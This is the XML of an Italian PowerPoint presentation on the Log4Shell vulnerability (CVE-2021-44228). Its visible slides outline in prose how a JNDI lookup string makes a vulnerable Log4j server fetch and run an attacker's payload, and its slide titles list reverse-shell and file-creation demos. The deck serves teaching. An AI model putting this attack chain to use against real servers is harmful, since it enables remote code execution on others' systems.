      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3910405772"/>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6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2352395" y="181025"/>
            <a:ext cx="4624684"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err="1"/>
              <a:t>Modello</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" err="1"/>
              <a:t>d’attacco</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="214" name="Google Shape;214;p36"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1087598" y="1154661"/>
            <a:ext cx="7154278" cy="3405682"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="l"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Un possibile schema d’attacco potrebbe essere:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="l"/>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>L’ attaccante costruisce una stringa opportuna che utilizza JNDI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>Viene passata la richiesta contenente la stringa ad un server che ha una versione vulnerabile di Log4j</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>Il server inizia la ricerca tramite JNDI e troverà il server che è sotto controllo dell’attaccante</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>Il server dell’attaccante risponde con un apposito payload malevolo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>Il server vulnerabile scarica il payload e lo esegue con i permessi del programma principale</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="l"/>
            <a:endParaRPr lang="it-IT" dirty="0">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215" name="Google Shape;215;p36"/>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36"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="629692" y="1105264"/>
            <a:ext cx="144992" cy="269768"/>
            <a:chOff x="629692" y="1105264"/>
            <a:chExt cx="144992" cy="269768"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="217" name="Google Shape;217;p36"/>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6"/>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36">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220" name="Google Shape;220;p36"/>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it-IT" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
            <a:endParaRPr sz="1000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="221" name="Google Shape;221;p36">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22" name="Google Shape;222;p36">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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="49202525"/>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6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2340659" y="181025"/>
            <a:ext cx="4624684"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err="1"/>
              <a:t>Modello</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" err="1"/>
              <a:t>d’attacco</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="215" name="Google Shape;215;p36"/>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36"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="629692" y="1105264"/>
            <a:ext cx="144992" cy="269768"/>
            <a:chOff x="629692" y="1105264"/>
            <a:chExt cx="144992" cy="269768"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="217" name="Google Shape;217;p36"/>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6"/>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36">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220" name="Google Shape;220;p36"/>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it-IT" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>9</a:t>
            </a:r>
            <a:endParaRPr sz="1000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="221" name="Google Shape;221;p36">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222" name="Google Shape;222;p36">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pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Immagine 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08B71DE8-EE58-8552-638C-2DB54AD3B403}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1842002" y="1414189"/>
            <a:ext cx="5621998" cy="2995327"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1921565549"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:wipe/>
  </p:transition>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Tech Company Branding Guidelines by Slidesgo">
  <a:themeElements>
    <a:clrScheme name="Simple Light">
      <a:dk1>
        <a:srgbClr val="011446"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="02227F"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="B7B7B7"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="FFFFFF"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="06BAD6"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="A1F1FE"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="079AB1"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="0081B0"/>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1092</TotalTime>
  <Words>1231</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Presentazione su schermo (16:9)</PresentationFormat>
  <Paragraphs>244</Paragraphs>
  <Slides>21</Slides>
  <Notes>20</Notes>
  <HiddenSlides>0</HiddenSlides>
  <MMClips>1</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21</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="26" baseType="lpstr">
      <vt:lpstr>Montserrat ExtraBold</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Montserrat Alternates</vt:lpstr>
      <vt:lpstr>Montserrat</vt:lpstr>
      <vt:lpstr>Tech Company Branding Guidelines by Slidesgo</vt:lpstr>
      <vt:lpstr>Log4Shell: CVE-2021-44228</vt:lpstr>
      <vt:lpstr>Log4j</vt:lpstr>
      <vt:lpstr>Log4j</vt:lpstr>
      <vt:lpstr>Log4Shell</vt:lpstr>
      <vt:lpstr>CVSS v3 Score</vt:lpstr>
      <vt:lpstr>CVSS v3 Score</vt:lpstr>
      <vt:lpstr>Modello d’attacco</vt:lpstr>
      <vt:lpstr>Modello d’attacco</vt:lpstr>
      <vt:lpstr>Modello d’attacco</vt:lpstr>
      <vt:lpstr> Strumenti utilizzati</vt:lpstr>
      <vt:lpstr> Classe vulnerabile</vt:lpstr>
      <vt:lpstr>JNDI Exploit</vt:lpstr>
      <vt:lpstr>Esempio 1: Creazione di un file</vt:lpstr>
      <vt:lpstr>Presentazione standard di PowerPoint</vt:lpstr>
      <vt:lpstr>Esempio 2: Reverse shell</vt:lpstr>
      <vt:lpstr>Presentazione standard di PowerPoint</vt:lpstr>
      <vt:lpstr>Presentazione standard di PowerPoint</vt:lpstr>
      <vt:lpstr>Presentazione standard di PowerPoint</vt:lpstr>
      <vt:lpstr>Presentazione standard di PowerPoint</vt:lpstr>
      <vt:lpstr>Conclusioni</vt:lpstr>
      <vt:lpstr>Grazie per l’attenzione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MyStego</dc:title>
  <cp:lastModifiedBy>FRANCESCO AURILIO</cp:lastModifiedBy>
  <cp:revision>32</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-10T08:21:59Z</dcterms:modified>
</cp:coreProperties>
</file>